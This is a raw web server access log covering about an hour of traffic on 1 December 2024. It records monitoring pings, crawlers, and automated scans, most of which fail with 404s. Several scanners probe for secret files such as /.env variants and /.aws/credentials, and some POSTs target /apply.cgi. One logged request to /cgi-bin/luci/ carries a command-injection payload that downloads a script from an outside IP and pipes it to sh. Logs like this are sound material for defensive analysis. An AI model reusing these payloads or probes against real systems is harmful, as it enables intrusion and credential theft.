78.153.140.177 - - [01/Dec/2024:21:51:48 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Opera/9.25 (Windows NT 6.0; U; sv)"
78.153.140.177 - - [01/Dec/2024:21:51:48 +0100] "\x16\x03\x01" 501 318 "-" "-"
78.153.140.177 - - [01/Dec/2024:21:51:49 +0100] "GET /.aws/credentials HTTP/1.1" 404 321 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.0.7) Gecko/2009030503 Fedora/3.0.7-1.fc9 Firefox/3.0.7"
78.153.140.177 - - [01/Dec/2024:21:51:49 +0100] "GET /.config.yaml HTTP/1.1" 404 317 "-" "Mozilla/5.0 (iPhone) AppleWebKit (KHTML, like Gecko) Mobile Safari/jtrip-app-1.0"
78.153.140.177 - - [01/Dec/2024:21:51:49 +0100] "GET /.env.bak HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Safari/535.2 wke/1.0"
78.153.140.177 - - [01/Dec/2024:21:51:50 +0100] "GET /.env.example HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Linux; Android 6.0.1; SM-G900V Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36"
78.153.140.177 - - [01/Dec/2024:21:51:50 +0100] "GET /.env.local HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Linux; U; Android 4.1.2; en-us; GT-I9100 Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
78.153.140.177 - - [01/Dec/2024:21:51:51 +0100] "GET /.env.prod HTTP/1.1" 404 314 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)"
78.153.140.177 - - [01/Dec/2024:21:51:51 +0100] "GET /.env.production HTTP/1.1" 404 320 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
78.153.140.177 - - [01/Dec/2024:21:51:51 +0100] "GET /.env.save HTTP/1.1" 404 314 "-" "Opera/9.80 (X11; Linux x86_64; U; de) Presto/2.2.15 Version/10.00"
78.153.140.177 - - [01/Dec/2024:21:51:51 +0100] "GET /.env.testing HTTP/1.1" 404 317 "-" "Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; de) Presto/2.9.168 Version/11.52"
78.153.140.177 - - [01/Dec/2024:21:51:51 +0100] "GET /.env~ HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5"
78.153.140.177 - - [01/Dec/2024:21:51:52 +0100] "GET /.json HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0"
78.153.140.177 - - [01/Dec/2024:21:51:52 +0100] "GET /?phpinfo=-1 HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.2.1; en-us; M470BSA Build/JOP40D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30"
212.91.246.72 - - [01/Dec/2024:21:52:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
47.245.117.221 - - [01/Dec/2024:21:52:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [01/Dec/2024:21:53:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:21:54:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
66.249.66.87 - - [01/Dec/2024:21:55:12 +0100] "GET /web12/library/Zend/ HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.91.246.72 - - [01/Dec/2024:21:55:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:21:56:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
205.210.31.230 - - [01/Dec/2024:21:56:40 +0100] "\x16\x03\x01" 501 318 "-" "-"
205.210.31.230 - - [01/Dec/2024:21:56:41 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [01/Dec/2024:21:57:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.50.16.198 - - [01/Dec/2024:21:58:21 +0100] "POST /apply.cgi HTTP/1.1" 404 314 "http://212.91.246.82:80/apply.cgi" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36"
212.91.246.72 - - [01/Dec/2024:21:58:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
59.127.230.183 - - [01/Dec/2024:21:58:30 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
95.214.55.79 - - [01/Dec/2024:21:58:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Dec/2024:21:59:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
38.39.133.98 - - [01/Dec/2024:21:59:48 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [01/Dec/2024:22:00:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.11.35 - - [01/Dec/2024:22:00:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Dec/2024:22:01:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.50.16.198 - - [01/Dec/2024:22:02:06 +0100] "POST /apply.cgi HTTP/1.1" 404 314 "http://212.91.246.85:80/apply.cgi" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36"
212.91.246.72 - - [01/Dec/2024:22:02:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
38.39.133.98 - - [01/Dec/2024:22:02:30 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [01/Dec/2024:22:03:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:22:04:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
38.39.133.98 - - [01/Dec/2024:22:04:38 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
195.178.110.57 - - [01/Dec/2024:22:05:17 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1"
8.211.162.45 - - [01/Dec/2024:22:05:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [01/Dec/2024:22:05:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:22:06:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:22:07:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:22:08:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
123.110.13.185 - - [01/Dec/2024:22:09:12 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
212.91.246.72 - - [01/Dec/2024:22:09:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
46.19.138.234 - - [01/Dec/2024:22:09:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Dec/2024:22:10:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
78.153.140.177 - - [01/Dec/2024:22:11:01 +0100] "\x16\x03\x01" 501 318 "-" "-"
78.153.140.177 - - [01/Dec/2024:22:11:01 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.0.12195 Safari/537.36"
78.153.140.177 - - [01/Dec/2024:22:11:01 +0100] "GET /.aws/credentials HTTP/1.1" 404 321 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.8) Gecko/2009032712 Ubuntu/8.10 (intrepid) Firefox/3.0.8"
78.153.140.177 - - [01/Dec/2024:22:11:02 +0100] "GET /.config.yaml HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36"
78.153.140.177 - - [01/Dec/2024:22:11:02 +0100] "GET /.env.bak HTTP/1.1" 404 313 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB7.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPDTDF; .NET4.0C; EIE10;ENUSWOL)"
78.153.140.177 - - [01/Dec/2024:22:11:02 +0100] "GET /.env.example HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; CrOS x86_64 7834.66.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.111 Safari/537.36"
78.153.140.177 - - [01/Dec/2024:22:11:03 +0100] "GET /.env.local HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36"
78.153.140.177 - - [01/Dec/2024:22:11:03 +0100] "GET /.env.prod HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; KFJWI Build/IMM76D) AppleWebKit/537.36 (KHTML, like Gecko) Silk/3.68 like Chrome/39.0.2171.93 Safari/537.36"
78.153.140.177 - - [01/Dec/2024:22:11:03 +0100] "GET /.env.production HTTP/1.1" 404 320 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/6.0; Touch; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; Tablet PC 2.0; HPDTDFJS)"
78.153.140.177 - - [01/Dec/2024:22:11:04 +0100] "GET /.env.save HTTP/1.1" 404 314 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; WOW64; Trident/5.0)"
78.153.140.177 - - [01/Dec/2024:22:11:04 +0100] "GET /.env.testing HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41"
78.153.140.177 - - [01/Dec/2024:22:11:04 +0100] "GET /.env~ HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0"
78.153.140.177 - - [01/Dec/2024:22:11:04 +0100] "GET /.json HTTP/1.1" 404 310 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X; en-us) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53"
78.153.140.177 - - [01/Dec/2024:22:11:05 +0100] "GET /?phpinfo=-1 HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; sl; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9"
195.178.110.57 - - [01/Dec/2024:22:11:19 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36"
212.91.246.72 - - [01/Dec/2024:22:11:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
195.178.110.57 - - [01/Dec/2024:22:11:44 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1"
212.91.246.72 - - [01/Dec/2024:22:12:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:22:13:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.50.16.198 - - [01/Dec/2024:22:14:00 +0100] "POST /apply.cgi HTTP/1.1" 404 314 "http://212.91.246.86:80/apply.cgi" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36"
141.98.11.35 - - [01/Dec/2024:22:14:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Dec/2024:22:14:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:22:15:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:22:16:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
59.126.72.231 - - [01/Dec/2024:22:16:39 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
195.178.110.57 - - [01/Dec/2024:22:16:50 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15"
194.50.16.198 - - [01/Dec/2024:22:17:04 +0100] "POST /apply.cgi HTTP/1.1" 404 314 "http://212.91.246.81:80/apply.cgi" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36"
212.91.246.72 - - [01/Dec/2024:22:17:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.11.35 - - [01/Dec/2024:22:17:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
195.178.110.57 - - [01/Dec/2024:22:18:02 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.87 Safari/537.36"
46.19.138.234 - - [01/Dec/2024:22:18:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
195.178.110.57 - - [01/Dec/2024:22:18:29 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Opera/9.80 (Android; Opera Mini/43.3.2254/150.36; U; en) Presto/2.12.423 Version/12.16"
212.91.246.72 - - [01/Dec/2024:22:18:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
195.178.110.57 - - [01/Dec/2024:22:19:22 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (OS/2; Warp 4.5; rv:10.0.12) Gecko/20100101 Firefox/10.0.12"
212.91.246.72 - - [01/Dec/2024:22:19:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.248 - - [01/Dec/2024:22:19:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Dec/2024:22:20:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
195.178.110.57 - - [01/Dec/2024:22:21:03 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; Android 6.0; Le X620 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36"
212.91.246.72 - - [01/Dec/2024:22:21:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
114.35.102.141 - - [01/Dec/2024:22:21:41 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
195.178.110.57 - - [01/Dec/2024:22:21:51 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36"
194.50.16.198 - - [01/Dec/2024:22:22:09 +0100] "POST /apply.cgi HTTP/1.1" 404 314 "http://212.91.246.89:80/apply.cgi" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36"
195.178.110.57 - - [01/Dec/2024:22:22:19 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/68.0.3440.75 Chrome/68.0.3440.75 Safari/537.36"
212.91.246.72 - - [01/Dec/2024:22:22:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.55.79 - - [01/Dec/2024:22:23:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Dec/2024:22:23:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.248 - - [01/Dec/2024:22:24:13 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
66.249.66.87 - - [01/Dec/2024:22:24:26 +0100] "GET /web12/library/Zend/Db/Profiler/Exception.php HTTP/1.1" 404 360 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.91.246.72 - - [01/Dec/2024:22:24:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
31.220.1.88 - - [01/Dec/2024:22:24:57 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Dec/2024:22:25:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:22:26:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.248 - - [01/Dec/2024:22:27:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
66.249.66.88 - - [01/Dec/2024:22:27:26 +0100] "GET /web35/backup/markenoele-source.gzip HTTP/1.1" 404 351 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.91.246.72 - - [01/Dec/2024:22:27:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
66.249.66.87 - - [01/Dec/2024:22:27:43 +0100] "GET /www.markenoele.de/log/2011/06/web.log HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.178.110.57 - - [01/Dec/2024:22:27:56 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/4.1 (compatible; MSIE 5.0; Symbian OS; Nokia 6600;452) Opera 6.20 [en-US]"
212.91.246.72 - - [01/Dec/2024:22:28:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.55.79 - - [01/Dec/2024:22:29:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Dec/2024:22:29:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
46.19.138.234 - - [01/Dec/2024:22:29:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Dec/2024:22:30:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.50.16.198 - - [01/Dec/2024:22:30:54 +0100] "POST /apply.cgi HTTP/1.1" 404 314 "http://212.91.246.83:80/apply.cgi" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36"
212.91.246.72 - - [01/Dec/2024:22:31:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.50.16.198 - - [01/Dec/2024:22:32:14 +0100] "POST /apply.cgi HTTP/1.1" 404 314 "http://212.91.246.80:80/apply.cgi" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36"
212.91.246.72 - - [01/Dec/2024:22:32:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:22:33:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:22:34:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:22:35:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:22:36:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
125.228.50.59 - - [01/Dec/2024:22:37:02 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
212.91.246.72 - - [01/Dec/2024:22:37:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.235.24.120 - - [01/Dec/2024:22:37:54 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [01/Dec/2024:22:38:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
46.19.138.234 - - [01/Dec/2024:22:38:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Dec/2024:22:39:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:22:40:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:22:41:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.50.16.198 - - [01/Dec/2024:22:42:23 +0100] "POST /apply.cgi HTTP/1.1" 404 314 "http://212.91.246.87:80/apply.cgi" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36"
212.91.246.72 - - [01/Dec/2024:22:42:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:22:43:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:22:44:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
8.211.162.45 - - [01/Dec/2024:22:44:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
185.191.126.248 - - [01/Dec/2024:22:45:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Dec/2024:22:45:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:22:46:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.11.35 - - [01/Dec/2024:22:46:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
179.43.163.250 - - [01/Dec/2024:22:46:54 +0100] "\x16\x03\x01" 501 318 "-" "-"
